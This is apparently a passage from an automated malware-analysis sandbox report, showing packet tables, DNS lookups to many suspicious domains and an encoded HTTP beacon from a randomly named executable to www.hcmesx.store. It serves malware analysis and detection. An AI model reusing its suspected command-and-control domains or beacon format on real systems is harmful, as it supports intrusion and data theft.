                                                                                                                                                                                                Nov 17, 2023 19:32:26.971451044 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:28.096101999 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:28.470828056 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:28.471415997 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:28.752504110 CET5020280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:28.845078945 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:28.845421076 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:29.208961964 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:29.209249973 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:29.209424019 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:29.586548090 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:29.586930990 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:29.767591000 CET5020280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:30.517549992 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:30.896899939 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:30.897147894 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:30.897322893 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:31.330440044 CET805020238.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:31.330651045 CET5020280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:31.330907106 CET5020280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:31.705914021 CET805020238.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:33.688695908 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:34.724539995 CET805020238.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:34.724994898 CET5020280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:34.724996090 CET5020280192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:35.096005917 CET805020238.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:39.265501022 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:39.632498026 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:39.633093119 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:39.633219004 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:39.734446049 CET5020380192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:40.070269108 CET805020334.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:40.070564985 CET5020380192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:40.070699930 CET5020380192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:40.407496929 CET805020334.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:40.484343052 CET805020334.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:40.530868053 CET5020380192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:41.577486992 CET5020380192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:42.593264103 CET5020480192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:42.940965891 CET805020434.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:42.941299915 CET5020480192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:42.941498995 CET5020480192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:43.288589954 CET805020434.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:43.366050959 CET805020434.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:43.423194885 CET5020480192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:44.452007055 CET5020480192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:45.467899084 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:45.808470964 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:45.808653116 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:45.810019970 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:45.810094118 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:45.810164928 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:46.147042036 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:46.147248983 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:46.147344112 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:46.147433043 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:46.228158951 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:46.279630899 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:46.485783100 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:46.485881090 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:46.486005068 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:46.486131907 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:46.486222982 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:46.486754894 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:46.488056898 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:46.822385073 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:46.823400974 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:46.824157953 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:47.107601881 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:47.310682058 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:47.444375992 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:47.444447041 CET805020534.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:47.444788933 CET5020580192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:48.326529980 CET5020680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:49.356976032 CET5020680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:49.693675995 CET805020634.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:49.694019079 CET5020680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:49.694117069 CET5020680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:50.029984951 CET805020634.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:50.107836962 CET805020634.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:50.153769016 CET5020680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:32:59.105067015 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:59.489937067 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:59.490139961 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:59.867763042 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:59.868015051 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:33:00.244929075 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:33:00.245497942 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:33:00.620630980 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:33:00.621028900 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:33:01.002199888 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:33:01.002630949 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:33:01.002791882 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:33:01.557648897 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:33:02.666742086 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:33:03.046866894 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:33:03.047149897 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:33:05.490614891 CET805020634.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:33:05.490757942 CET5020680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:33:06.915795088 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:33:07.290719986 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:33:20.827234030 CET805020634.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:33:20.827430964 CET5020680192.168.11.2034.126.191.84
                                                                                                                                                                                                Nov 17, 2023 19:33:36.175520897 CET805020634.126.191.84192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:33:36.175636053 CET5020680192.168.11.2034.126.191.84
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 17, 2023 19:25:34.518012047 CET5297753192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:25:34.617724895 CET53529771.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:25:35.497598886 CET5066853192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:25:35.613116026 CET53506681.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:25:56.865823984 CET6201353192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:25:57.016339064 CET53620131.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:12.756618023 CET5983153192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:26:12.871015072 CET53598311.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:20.926806927 CET5776153192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:26:21.503256083 CET53577611.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:35.048793077 CET5824253192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:26:35.985754967 CET53582421.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:26:49.389365911 CET6349553192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:26:49.576992035 CET53634951.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:03.042434931 CET5897653192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:27:03.265640974 CET53589761.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:27:47.814101934 CET5506253192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:27:48.628782988 CET53550621.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:17.935009956 CET5544053192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:29:18.287287951 CET53554401.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:31.947731972 CET4961453192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:29:32.058398008 CET53496141.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:45.632082939 CET5166853192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:29:45.775048018 CET53516681.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:58.957566977 CET6107453192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:29:59.109231949 CET53610741.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:13.297929049 CET6195253192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:30:13.493397951 CET53619521.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:26.638690948 CET5320153192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET53532011.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:40.166999102 CET5982953192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:30:40.272003889 CET53598291.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:53.367264986 CET5868153192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:30:53.805269003 CET53586811.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:07.302249908 CET5675153192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:31:07.486740112 CET53567511.1.1.1192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:29.515892982 CET4921653192.168.11.201.1.1.1
                                                                                                                                                                                                Nov 17, 2023 19:31:29.617707968 CET53492161.1.1.1192.168.11.20
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 17, 2023 19:25:34.518012047 CET192.168.11.201.1.1.10x54ebStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:25:35.497598886 CET192.168.11.201.1.1.10xdda9Standard query (0)doc-08-18-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:25:56.865823984 CET192.168.11.201.1.1.10xc28Standard query (0)www.342448.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:26:12.756618023 CET192.168.11.201.1.1.10xb2f1Standard query (0)www.cardsfinanse.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:26:20.926806927 CET192.168.11.201.1.1.10xb626Standard query (0)www.bellcom.mediaA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:26:35.048793077 CET192.168.11.201.1.1.10xe696Standard query (0)www.hcmesx.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:26:49.389365911 CET192.168.11.201.1.1.10x62Standard query (0)www.frhighdaypharms.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:27:03.042434931 CET192.168.11.201.1.1.10x3765Standard query (0)www.g9rq2sx.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:27:47.814101934 CET192.168.11.201.1.1.10xbcf9Standard query (0)www.jilimacao1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:29:17.935009956 CET192.168.11.201.1.1.10xd11cStandard query (0)www.lets-room.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:29:31.947731972 CET192.168.11.201.1.1.10xff00Standard query (0)www.visionquestengage.lifeA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:29:45.632082939 CET192.168.11.201.1.1.10x5ad8Standard query (0)www.ritualyoga.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:29:58.957566977 CET192.168.11.201.1.1.10xe151Standard query (0)www.zzxxyy13.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:13.297929049 CET192.168.11.201.1.1.10x5f21Standard query (0)www.littlehappiez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.638690948 CET192.168.11.201.1.1.10x1cbfStandard query (0)www.alwayswim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:40.166999102 CET192.168.11.201.1.1.10x71e1Standard query (0)www.meikaij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:53.367264986 CET192.168.11.201.1.1.10xc3Standard query (0)www.ayotundewrites.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:31:07.302249908 CET192.168.11.201.1.1.10xae0fStandard query (0)www.scoopstarz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:31:29.515892982 CET192.168.11.201.1.1.10x4b9Standard query (0)www.cardsfinanse.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 17, 2023 19:25:34.617724895 CET1.1.1.1192.168.11.200x54ebNo error (0)drive.google.com142.250.176.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:25:35.613116026 CET1.1.1.1192.168.11.200xdda9No error (0)doc-08-18-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:25:35.613116026 CET1.1.1.1192.168.11.200xdda9No error (0)googlehosted.l.googleusercontent.com142.250.81.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:25:57.016339064 CET1.1.1.1192.168.11.200xc28No error (0)www.342448.com104.21.46.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:25:57.016339064 CET1.1.1.1192.168.11.200xc28No error (0)www.342448.com172.67.143.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:26:12.871015072 CET1.1.1.1192.168.11.200xb2f1Name error (3)www.cardsfinanse.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:26:21.503256083 CET1.1.1.1192.168.11.200xb626No error (0)www.bellcom.media91.195.240.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:26:35.985754967 CET1.1.1.1192.168.11.200xe696No error (0)www.hcmesx.store38.59.48.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:26:49.576992035 CET1.1.1.1192.168.11.200x62No error (0)www.frhighdaypharms.comfrhighdaypharms.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:26:49.576992035 CET1.1.1.1192.168.11.200x62No error (0)frhighdaypharms.com209.182.252.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:27:03.265640974 CET1.1.1.1192.168.11.200x3765No error (0)www.g9rq2sx.icu38.163.97.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:27:48.628782988 CET1.1.1.1192.168.11.200xbcf9No error (0)www.jilimacao1.comweb.wj-web.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:27:48.628782988 CET1.1.1.1192.168.11.200xbcf9No error (0)web.wj-web.net34.126.191.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:27:48.628782988 CET1.1.1.1192.168.11.200xbcf9No error (0)web.wj-web.net128.1.231.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:27:48.628782988 CET1.1.1.1192.168.11.200xbcf9No error (0)web.wj-web.net128.1.231.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:27:48.628782988 CET1.1.1.1192.168.11.200xbcf9No error (0)web.wj-web.net13.212.61.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:27:48.628782988 CET1.1.1.1192.168.11.200xbcf9No error (0)web.wj-web.net18.167.99.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:27:48.628782988 CET1.1.1.1192.168.11.200xbcf9No error (0)web.wj-web.net20.24.193.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:29:18.287287951 CET1.1.1.1192.168.11.200xd11cNo error (0)www.lets-room.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:29:32.058398008 CET1.1.1.1192.168.11.200xff00No error (0)www.visionquestengage.life198.177.123.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:29:45.775048018 CET1.1.1.1192.168.11.200x5ad8No error (0)www.ritualyoga.org216.40.34.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:29:59.109231949 CET1.1.1.1192.168.11.200xe151No error (0)www.zzxxyy13.top160.202.170.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:13.493397951 CET1.1.1.1192.168.11.200x5f21No error (0)www.littlehappiez.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:13.493397951 CET1.1.1.1192.168.11.200x5f21No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:26.859719992 CET1.1.1.1192.168.11.200x1cbfNo error (0)www.alwayswim.com45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:40.272003889 CET1.1.1.1192.168.11.200x71e1No error (0)www.meikaij.com199.59.243.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:53.805269003 CET1.1.1.1192.168.11.200xc3No error (0)www.ayotundewrites.comayotundewrites.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:30:53.805269003 CET1.1.1.1192.168.11.200xc3No error (0)ayotundewrites.com83.229.19.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:31:07.486740112 CET1.1.1.1192.168.11.200xae0fNo error (0)www.scoopstarz.com104.21.52.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:31:07.486740112 CET1.1.1.1192.168.11.200xae0fNo error (0)www.scoopstarz.com172.67.202.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 17, 2023 19:31:29.617707968 CET1.1.1.1192.168.11.200x4b9Name error (3)www.cardsfinanse.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                • drive.google.com
                                                                                                                                                                                                • doc-08-18-docs.googleusercontent.com
                                                                                                                                                                                                • www.342448.com
                                                                                                                                                                                                • www.bellcom.media
                                                                                                                                                                                                • www.hcmesx.store
                                                                                                                                                                                                • www.frhighdaypharms.com
                                                                                                                                                                                                • www.g9rq2sx.icu
                                                                                                                                                                                                • www.jilimacao1.com
                                                                                                                                                                                                • www.lets-room.online
                                                                                                                                                                                                • www.visionquestengage.life
                                                                                                                                                                                                • www.ritualyoga.org
                                                                                                                                                                                                • www.zzxxyy13.top
                                                                                                                                                                                                • www.littlehappiez.com
                                                                                                                                                                                                • www.alwayswim.com
                                                                                                                                                                                                • www.meikaij.com
                                                                                                                                                                                                • www.ayotundewrites.com
                                                                                                                                                                                                • www.scoopstarz.com
                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                10192.168.11.205013738.59.48.8680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:44.213428974 CET424OUTGET /fbkg/?T6I=JuP+2JK8vI5+yQGAW5l1o2dXq+3Ksd0y6wg1KdtNGd9Gu0TSnfkwjHMHJqFqjZu7ChSweGH6mw1hhK/OtJKBpxcTcfvHXyAOQQ==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:26:44.379849911 CET425INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:45 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
